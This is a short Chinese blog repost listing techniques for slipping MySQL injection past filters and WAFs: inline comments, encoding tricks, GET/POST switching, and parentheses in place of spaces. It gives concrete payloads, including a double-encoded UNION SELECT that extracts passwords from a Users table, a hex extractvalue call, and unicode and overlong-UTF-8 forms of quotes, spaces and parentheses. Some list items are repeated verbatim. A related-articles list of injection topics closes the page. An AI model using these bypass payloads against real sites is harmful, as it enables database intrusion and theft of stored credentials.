Mysql注入绕过姿势
2016-11-25 17:59
519 查看
1.内联绕过
2.编码绕过,如URLEncode编码,ASCII,HEX,unicode编码绕过
3.提交方式绕过,有的只过滤了GET却未对POST进行过滤
4.括号绕过空格:http://www.lijiejie.com/mysql-injection-bypass-waf-2/
参考文章:http://www.cnblogs.com/joy-nick/p/5774462.html
2.编码绕过,如URLEncode编码,ASCII,HEX,unicode编码绕过
or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 十六进制编码 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) 双重编码绕过 ?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+ 一些unicode编码举例: 单引号:' %u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7 空白: %u0020 %uff00 %c0%20 %c0%a0 %e0%80%a0 左括号(: %u0028 %uff08 %c0%28 %c0%a8 %e0%80%a8 右括号): %u0029 %uff09 %c0%29 %c0%a9 %e0%80%a9
3.提交方式绕过,有的只过滤了GET却未对POST进行过滤
4.括号绕过空格:http://www.lijiejie.com/mysql-injection-bypass-waf-2/
参考文章:http://www.cnblogs.com/joy-nick/p/5774462.html
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 一个容易被忽视的技巧—MySQL 绕过防注入
- mysql利用颜表情绕过waf注入
- mysql绕过注入过滤
- PHP函数 addslashes() 和 mysql_real_escape_string() 的区别 && SQL宽字节,绕过单引号注入攻击
- mysql注入绕过的一些技巧
- 注入的花式绕过姿势--向鸡哥学习
- mysql注入新姿势(数字与字符编码注入) hex,conv
- mysql注入绕过tips
- mysql注入绕过空格过滤的方法
- mysql注入相关
- 防止MySQL注入或HTML表单滥用的PHP程序
- php+mysql 注入
- SQL注入中绕过 单引号 限制继续注入
- 从php+mysql环境的注入,到整台服务器的沦陷
- MySQL权限提升及安全限制绕过漏洞
- SQL注入中绕过 单引号 限制继续注入
- MYSQL 注入精华
- 利用PHP程序设定防止MySQL注入或HTML表单滥用
- MYSQL的SQL注入之宽字节注入
- MYSQL-INFORMATION_SCHEMA信息数据库(MYSQL注入猜解)